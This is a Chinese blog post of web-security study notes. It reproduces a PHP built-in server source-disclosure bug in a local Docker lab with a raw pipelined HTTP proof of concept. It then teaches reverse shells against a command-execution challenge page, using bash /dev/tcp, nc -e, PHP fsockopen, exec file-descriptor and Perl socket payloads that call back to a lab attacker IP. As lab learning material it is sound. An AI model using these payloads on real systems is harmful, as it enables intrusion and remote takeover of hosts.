<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" type="application/atom+xml"><link rel="alternate" type="application/json" title="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~" href="https://zlaryy.top/feed.json"/><link rel="preconnect" href="https://s4.zstatic.net"/><link rel="preconnect" href="https://at.alicdn.com"/><link rel="modulepreload" href="/js/siteInit.js"></link><link rel="modulepreload" href="/js/nyx-player-HIXTN7KD.js"></link><link rel="modulepreload" href="/js/copy-tex-4AIDXWNJ.js"></link><link rel="modulepreload" href="/js/post-MYXPIC3N.js"></link><link rel="modulepreload" href="/js/chunk-T54OBHW4.js"></link><link rel="modulepreload" href="/js/index.esm-22UB7CNZ.js"></link><link rel="modulepreload" href="/js/chunk-HJSTZ4VX.js"></link><link rel="modulepreload" href="/js/chunk-ALXQBZTY.js"></link><link rel="stylesheet" href="/css/siteInit.css" media="none" onload="this.media&#x3D;&#39;all&#39;"></link><link rel="preload" href="/assets/picture5.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture4.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture3.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture2.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture2.webp" as="image" fetchpriority="high"><link rel="preload" href="/assets/picture1.webp" as="image" fetchpriority="high"><meta name="keywords" content="Web安全"/><meta name="description" content="Web安全 / CTF / 个人学习笔记"/><link rel="canonical" href="https://zlaryy.top/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/"><link rel="stylesheet" href="/css/post.css?v=0.5.4"><link rel="stylesheet" href="/css/mermaid.css?v=0.5.4"><!-- 临时处理--><link rel="stylesheet" media="none" onload="this.media='all'" href="https://s4.zstatic.net/ajax/libs/KaTeX/0.16.9/katex.min.css"><title>低版本php下信息泄露的CVE漏洞与反弹shell</title><!-- hexo injector head_end start --><link rel="stylesheet" href="https://npm.elemecdn.com/lxgw-wenkai-screen-webfont/style.css">
<link rel="stylesheet" href="/css/custom.css"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="pagefind_mount"></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">低版本php下信息泄露的CVE漏洞与反弹shell</h1><div class="meta"><span class="item" title="创建时间：2026-03-12 16:30:00"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2026-03-12T16:30:00+08:00">2026-03-12</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>8.5k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>8 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">ZLARYY</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" style="background-image: url(&quot;/assets/picture5.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture4.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture3.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture2.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture2.webp&quot;);"></li><li class="item" style="background-image: url(&quot;/assets/picture1.webp&quot;);"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" data-pagefind-body="data-pagefind-body" lang="zh-CN"><link itemprop="mainEntityOfPage" href="https://zlaryy.top/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avertar.png"/><meta itemprop="name" content="ZLARYY"/><meta itemprop="description" content=", Web安全 / CTF / 个人学习笔记"/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~"/></span><div class="body md" itemprop="articleBody"><h1 id="低版本php下信息泄露的cve漏洞"><a class="anchor" href="#低版本php下信息泄露的cve漏洞">#</a> 低版本php下信息泄露的CVE漏洞</h1>
<p>为了复现这个漏洞拉个docker老是出问题，直接把这篇文章（<a target="_blank" rel="noopener" href="https://blog.csdn.net/Kawakaze_JF/article/details/133046885?sharetype=blogdetail&amp;shareId=133046885&amp;sharerefer=APP&amp;sharesource=2503_93592530&amp;sharefrom=qq%EF%BC%89%E9%87%8C%E7%9A%84%E5%91%BD%E4%BB%A4%E5%80%9F%E6%9D%A5%E7%94%A8%E7%94%A8%E5%90%A7%EF%BC%9A">https://blog.csdn.net/Kawakaze_JF/article/details/133046885?sharetype=blogdetail&amp;shareId=133046885&amp;sharerefer=APP&amp;sharesource=2503_93592530&amp;sharefrom=qq）里的命令借来用用吧：</a></p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>apt-get install docker.io</span></span>
<span class="line"><span>//下载dpcker</span></span>
<span class="line"><span></span></span>
<span class="line"><span>service docker start</span></span>
<span class="line"><span>//启动docker</span></span>
<span class="line"><span></span></span>
<span class="line"><span>docker pull php:7.4.21 </span></span>
<span class="line"><span>//拉取php 7.4.21的镜像</span></span>
<span class="line"><span></span></span>
<span class="line"><span>docker run -it -p 8080:80  4ad229e4e700  /bin/bash</span></span>
<span class="line"><span>//运行镜像 将docker 的80端口映射到kali的8080端口</span></span>
<span class="line"><span></span></span>
<span class="line"><span>echo "&#x3C;?php \$flag=ZLARYY&#123;2L47yY&#125;" > /var/www/html/secret.php</span></span>
<span class="line"><span>//写入文件</span></span>
<span class="line"><span></span></span>
<span class="line"><span>php -S 0.0.0.0:80</span></span>
<span class="line"><span>//通过php -S开启web服务(必须)</span></span></code></pre>
<p>关于这个漏洞的详细部分在：</p>
<p><a target="_blank" rel="noopener" href="https://projectdiscovery.io/blog/php-http-server-source-disclosure#root-cause-analysis">https://projectdiscovery.io/blog/php-http-server-source-disclosure#root-cause-analysis</a></p>
<p>恕我实在无能为力全部理解，只能靠AI帮我解释一下：</p>
<p>PHP 内置 Web 服务器（<code>php_cli_server</code>）底层的 C 语言状态机，在处理 <strong>“HTTP 请求管道化（Pipelining）”</strong> 时发生了严重的指针错乱。</p>
<p>正常的 HTTP 是一问一答（发一个请求，等一个响应）。但管道化允许你<strong>把两个甚至多个 HTTP 请求，硬塞进同一个 TCP 数据包里同时发过去！</strong></p>
<p>所以接下来的逻辑是这样：我们的paylaod当中包含两个GET请求，并且故意不加上<code>Content-Length</code>请求头，这样<code>php_http_parse</code>在解析完第一个请求头之后由于没有看到长度，提前触发了<code>messge_complete(消息完成)</code>的回调函数，但我们还加上了第二个请求在后面，此时状态机会被强行拉回初始状态，在这样的条件下，php引擎的内部标志位被覆盖了，原本应该判断<code>.php</code>后缀需要拿去执行，但由于错误地把<code>is_static_file</code>的标志位设置为了1，那么php引擎就将这个<code>.php</code>文件视为静态文件，如<code>.txt</code>，就导致了php代码没有被执行，还输出了源码作为结果</p>
<p>在确定请求文件是静态文件还是php文件时，利用的是如下代码：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>static  int  php_cli_server_dispatch(php_cli_server *server, php_cli_server_client *client) &#123;</span></span>
<span class="line"><span>...</span></span>
<span class="line"><span>	if (client->request.ext_len != 3</span></span>
<span class="line"><span>	|| (ext[0] != 'p' &#x26;&#x26; ext[0] != 'P') || (ext[1] != 'h' &#x26;&#x26; ext[1] != 'H') || (ext[2] != 'p' &#x26;&#x26; ext[2] != 'P')</span></span>
<span class="line"><span>	|| !client->request.path_translated) &#123;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>	is_static_file = 1;</span></span>
<span class="line"><span>	&#125;</span></span>
<span class="line"><span>...</span></span>
<span class="line"><span>&#125;</span></span></code></pre>
<p>上述代码包含一个检查，用于确定请求的文件应被视为静态文件还是 PHP 文件。这是通过检查文件扩展名来实现的。如果扩展名不是 <code>.src  .php</code>或<code>.PHP  .ph</code>，或者扩展名的长度不等于 3，则该文件被视为静态文件。这通过将变量设置<code>is_static_file</code>为 1 来指示。</p>
<p>代码还会检查对象<code>path_translated</code>的某个字段<code>client-&gt;request</code>是否为空。该字段包含文件系统中请求文件的完整路径，用于定位和提供该文件。如果该<code>path_translated</code>字段为空，则表示找不到请求的文件，请求将被视为错误。</p>
<p>那么接下来尝试尝试复现这个漏洞，先给出poc：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>GET /secret.php HTTP/1.1\r\n</span></span>
<span class="line"><span>Host: 192.168.xxx.xxx:8080\r\n</span></span>
<span class="line"><span>\r\n</span></span>
<span class="line"><span>\r\n</span></span>
<span class="line"><span>GET /ZLARYY HTTP/1.1\r\n</span></span>
<span class="line"><span>\r\n</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/1.png" class=""></p>
<p>由于我们的攻击原理中不能让其找到<code>Content-Length</code>，所以需要关闭<code>Update Content-Length</code>，注意上面的poc里面的<code>\r\n</code>不是手动加上去的，而是开启了burp的<code>\n</code></p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/2.png" class=""></p>
<h1 id="反弹shell"><a class="anchor" href="#反弹shell">#</a> 反弹shell</h1>
<p>其实挺早就了解到有这个方法了，在搭建起来kali里面的apache之后现在总算有机会尝试复现了</p>
<p>反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端 的角色反转。</p>
<p>关于反弹shell我的理解是kali上开启监听端口，然后让靶机上开启命令行并且主动连接我的监听端，从而让我在监听端的输入都转入到靶机上，而靶机上的输出都返回到我的监听端</p>
<p>一种特别典型的利用反弹shell的题目是<strong>无回显RCE</strong></p>
<p>题目如下：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-php"><span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">&#x3C;</span><span style="color:#AB5959;--shiki-dark:#CB7676">?</span><span style="color:#A65E2B;--shiki-dark:#C99076">php</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">highlight_file</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#1E754F;--shiki-dark:#4D9375">__FILE__</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#998418;--shiki-dark:#B8A965">exec</span><span style="color:#2993a3;--shiki-dark:#5eaab5">(</span><span style="color:#999999;--shiki-dark:#666666">$</span><span style="color:#B07D48;--shiki-dark:#BD976A">_GET</span><span style="color:#1e754f;--shiki-dark:#4d9375">[</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#B56959;--shiki-dark:#C98A7D">cmd</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">'</span><span style="color:#1e754f;--shiki-dark:#4d9375">]</span><span style="color:#2993a3;--shiki-dark:#5eaab5">)</span><span style="color:#999999;--shiki-dark:#666666">;</span></span>
<span class="line"><span style="color:#AB5959;--shiki-dark:#CB7676">?</span><span style="color:#AB5959;--shiki-dark:#CB7676">></span></span></code></pre>
<h2 id="bash反弹"><a class="anchor" href="#bash反弹">#</a> bash反弹</h2>
<p>这里我直接先给出payload：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/?cmd=echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE1Mi4xMjgvNzc3NyAwPiYx%20|%20base64%20-d%20|%20bash</span></span>
<span class="line"><span></span></span>
<span class="line"><span>其实原paylaod长这样：</span></span>
<span class="line"><span>bash -i >&#x26; /dev/tcp/192.168.152.128/7777 0>&#x26;1</span></span>
<span class="line"><span>同时我们还需要在kali上开启</span></span>
<span class="line"><span>nc -lvnp 7777</span></span></code></pre>
<p><strong>bash -i &gt;&amp; /dev/tcp/192.168.152.128/7777 0&gt;&amp;1</strong>：</p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/pandana/p/16289320.html">https://www.cnblogs.com/pandana/p/16289320.html</a></p>
<p>1、bash -i：在靶机上启动一个交互式（interactive）的Bash终端</p>
<p>2、/dev/tcp/是Linux中的一个特殊设备文件,实际这个文件是不存在的，它只是 bash 用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用，建立一个socket连接，读写这个文件就相当于在这个socket连接中传输数据。同理，Linux中还存在/dev/udp/。</p>
<p>3、192.168.1.102/7777则是攻击者主机的地址和监听的端口了。</p>
<p>4、“&gt;&amp;”和“0&gt;&amp;1”</p>
<p>要想了解“&gt;&amp;”和“0&gt;&amp;1”，首先我们要先了解一下Linux文件描述符和重定向。linux shell下常用的文件描述符是：</p>
<p>(1)标准输入(stdin) ：代码为 0 ，使用 &lt; 或 &lt;&lt;</p>
<p>(2)标准输出(stdout)：代码为 1 ，使用 &gt; 或 &gt;&gt;</p>
<p>(3)标准错误输出(stderr)：代码为 2 ，使用 2&gt; 或 2&gt;&gt;</p>
<p>这里的”&gt;&amp;”与”&amp;&gt;”是等价的，都是表示混合输出，即标准输出1 + 错误输出2。其实 2&gt;&amp;1也是将标准错误输出重定向到标准输出中的意思。那么按照这个逻辑，“0&gt;&amp;1”就是将标准输入重定向到标准输出中。事实也就是如此，“0&gt;&amp;1”跟“0&amp;&gt;1”同样也是等价的。</p>
<p>回到题目上来说，由于我们的payload里面出现了<code>&amp;</code>符号，那么在URL传参时会把我们的payload截断，所以必须用<code>echo &quot;[base64]&quot;|base64 -d|sh</code>对<code>&amp;</code>绕过，除此之外，直接解析我们的payload的是<code>/bin/sh指向的dash</code>，这个dash在读到<code>&gt;&amp;</code>会直接报语法错误，用echo和管道符最后时候用bash或者sh才会将我们的bash反弹payload交给bash执行</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/3.png" class=""></p>
<p>这样我们就算成功反弹shell了，之后我们在这个命令行上输入的所有命令都与index.php的限制没有任何关系了，我们直接与靶机的命令行交互，并且靶机的执行结果直接显示到我们的bash上：</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/4.png" class=""></p>
<p>接下来我想深入了解一下<code>&gt;&amp;</code>和<code>0&gt;&amp;1</code>：</p>
<p>在本博客的RCE部分中提到过<code>&amp;</code>，当时是说：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>将前面的命令放在后台执行，不等前面的命令执行结束就开始执行后面的命令，还有一种用法是在一行命令末尾加上&#x26;符号使其放在后台运行，比如下载文件……</span></span></code></pre>
<p>不过这里不是这样，<code>&gt;&amp;</code>表示重定向操作符，<code>&amp;</code>变成了一个指针标记</p>
<p>不加上<code>&amp;</code>的情况下，<code>echo &quot;ZLARYY&quot; &gt;1</code>表示将ZLARYY字符串写入1这个文件</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/5.png" class=""></p>
<p>但是如果加上<code>&amp;</code>之后，<code>echo &quot;ZLARYY&quot; &gt;&amp;1</code>的意思就变成了将这个字符串写进编号为1的系统通道，即标准输出：</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/6.png" class=""></p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/7.png" class=""></p>
<p>而使用<code>&gt;&amp; /dev/tcp/192.168.152.128/7777</code>的原理其实是这样：</p>
<p>如同上面的<code>&gt;&amp;shell</code>一样，使用<code>&gt;&amp;</code>之后，系统原本准备去打开或者创建一个文件，但由于bash解释器在把命令交给Linux内核的时候，会先检查一遍要写入的路径，当bash看到路径以<code>/dev/tcp</code>或者<code>/dev/udp</code>开头，会触发一种特殊的拦截机制，这时候就不会去硬盘上创建文件了，而是调用底层的socket()网络编程接口，向对应的IP地址和端口发起一次TCP握手，此时<code>&gt;&amp;</code>作为<strong>混合输出</strong>，将标准输出和标准错误混在一起，最后顺着TCP发送到对应的IP地址和端口</p>
<p>之后由于存在<code>0&gt;&amp;1</code>和<code>nc</code>命令，系统会将我们输入的<code>cat /flag\n</code>变成纯粹的二进制数据包（TCP payload），顺着虚拟网线传输到靶机上，并且<code>0&gt;&amp;1</code>将靶机的标准输入转接到1通道上，导致传输进来的<code>cat /flag\n</code>被当做靶机的标准输入执行，将标准输出顺着TCP发送到我们的kali上</p>
<p>那么为什么我的kali上的标准输入会连接到TCP呢？</p>
<p>这是由于<code>nc</code>命令，一旦<code>nc</code>建立连接，<code>nc(Netcat)</code>会自动把kali的标准输入绑定到TCP连接上，同时将标准输出也绑定上，比如：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>nc -lvvp 7777</span></span>
<span class="line"><span>//开启nc之后用windows访问192.168.152.128:7777</span></span></code></pre>
<p>我们能看到：</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/8.png" class=""></p>
<p>这意味着我们接收到了Chorm浏览器的请求，此时如果我在kali上输入</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>HTTP/1.1 200 OK</span></span>
<span class="line"><span>Content-Type: text/html</span></span>
<span class="line"><span></span></span>
<span class="line"><span>&#x3C;h1>Hello ZLARYY&#x3C;/h1></span></span></code></pre>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/9.png" class=""></p>
<p>那么在我们windows上的Chorm就可以看到kali标准输入的结果传输到了Chorm上</p>
<p>我之前提到exec调用的是<code>/bin/sh的dash</code>而不是bash，其实还有一种方法可以避免使用base64编码和管道符：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cmd=bash -c "bash -i >%26 /dev/tcp/192.168.152.128/7777 0>%261"</span></span></code></pre>
<p>%26是<code>&amp;</code>的URL编码，<code>-c</code>意味着将一段字符串强制作为bash的命令执行</p>
<h2 id="nc反弹"><a class="anchor" href="#nc反弹">#</a> nc反弹</h2>
<p>当然反弹shell可不止bash，nc反弹之前在限制长度的RCE中学到过：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>nc -e /bin/bash 192.168.152.128 7777</span></span></code></pre>
<p>在前文我们提到了<code>nc</code>命令可以主动将标准输入和标准输出连接到靶机，<code>-e</code>参数表示execute执行，那么<code>nc -e /bin/bash</code>意思就是一旦连接上，那么就执行<strong>靶机上的</strong><code>/bin/bash</code>程序，并且将标准输出标准输入标准错误输出全部连接到kali中</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/10.png" class=""></p>
<h2 id="php反弹"><a class="anchor" href="#php反弹">#</a> php反弹</h2>
<p>php反弹利用了php中的原生函数<code>fsockopen</code>，该函数在本博客SSRF一栏中提到：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>此函数用于打开一个网络Socket连接，允许与任意主机和端口进行原始的TCP通信。它比HTTP库更底层，因此可以与被防火墙保护的、非HTTP协议的内网服务（如Redis、MySQL、Memcached）直接交互。</span></span></code></pre>
<p>一种payload为：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>php -r '$sock=fsockopen("192.168.152.128",7777);exec("/bin/sh -i &#x3C;&#x26;3 >&#x26;3 2>&#x26;3");'</span></span></code></pre>
<p><code>fsockopen(&quot;192.168.152.128&quot;,7777)</code>表示向kali发起TCP连接</p>
<p><code>exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;)</code>：之前有提到过文件描述符：0表示输入，使用<code>&lt;</code>或<code>&lt;&lt;</code>；1表示输出，使用<code>&gt;</code>或<code>&gt;&gt;</code>；2表示错误，使用<code>2&gt;</code>或<code>2&gt;&gt;</code>。当连接成功后，操作系统会给这个网络套接字分配一个文件描述符，由于0,1,2都有表示，那么这个新建立的socket网络编号通常为3</p>
<p><code>&lt;&amp;3</code>，<code>&gt;&amp;3</code>，<code>2&gt;&amp;3</code>就像<code>&gt;&amp;</code>和<code>0&gt;&amp;1</code>一样：</p>
<p><code>&lt;&amp;3</code>：把标准输入接在网络套接字（3）上，用于接收命令</p>
<p><code>&gt;&amp;3</code>：把标准输出接在网络套接字上，传回执行结果</p>
<p><code>2&gt;&amp;3</code>：把报错信息接在网络套接字上</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/11.png" class=""></p>
<p>还有一种就和bash反弹没什么区别了：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>php -r 'exec("bash -c \"bash -i >%26 /dev/tcp/192.168.152.128/7777 0>%261\"");'</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/12.png" class=""></p>
<h2 id="exec反弹"><a class="anchor" href="#exec反弹">#</a> exec反弹</h2>
<p>exec反弹也是利用文件描述符和网络socket：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>bash-c '0&#x3C;&#x26;196;exec 196&#x3C;>/dev/tcp/192.168.152.128/7777; sh &#x3C;&#x26;196 >&#x26;196 2>&#x26;196'</span></span></code></pre>
<p><code>0&lt;&amp;196</code>：把标准输入重定向，去读取文件描述符196里面的内容，这是为了确保当前的输入流被强行接管或者纯粹是老版本系统用来初始化占位</p>
<p><code>exec 196&lt;&gt;/dev/tcp/192.168.152.128/7777</code>：这里有一个exec的另一种用法：当exec后面没有接任何命令，只接了重定向符号时，exec的作用就变成了<strong>永久修改当前bash进程的文件描述符</strong>，而这句话就相当于开启一个与我的kali相连的网络连接，并把这个连接命名为196</p>
<p><code>sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</code>：其实也和<code>&lt;&amp;3</code>，<code>&gt;&amp;3</code>，<code>2&gt;&amp;3</code>一样了</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/13.png" class=""></p>
<h2 id="perl反弹"><a class="anchor" href="#perl反弹">#</a> perl反弹</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>perl -e 'use Socket;$i="192.168.152.128";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,">&#x26;S");open(STDOUT,">&#x26;S");open(STDERR,">&#x26;S");exec("/bin/sh -i");&#125;;'</span></span></code></pre>
<p>其实有了前几个反弹的技巧，这个应该也不难看出来：</p>
<p><code>use Socket;$i=&quot;192.168.152.128&quot;;$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;))</code>：Perl版本的建桥指令，或者说就相当于php反弹里的fsockopen()，它向kali发起TCP连接，并把这个连接命名为句柄<code>S</code></p>
<p><code>open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;)</code>：将标准输出标准输入和标准错误重定向到<code>S</code>上</p>
<p><code>exec(&quot;/bin/sh -i&quot;)</code>：调用操作系统</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/14.png" class=""></p>
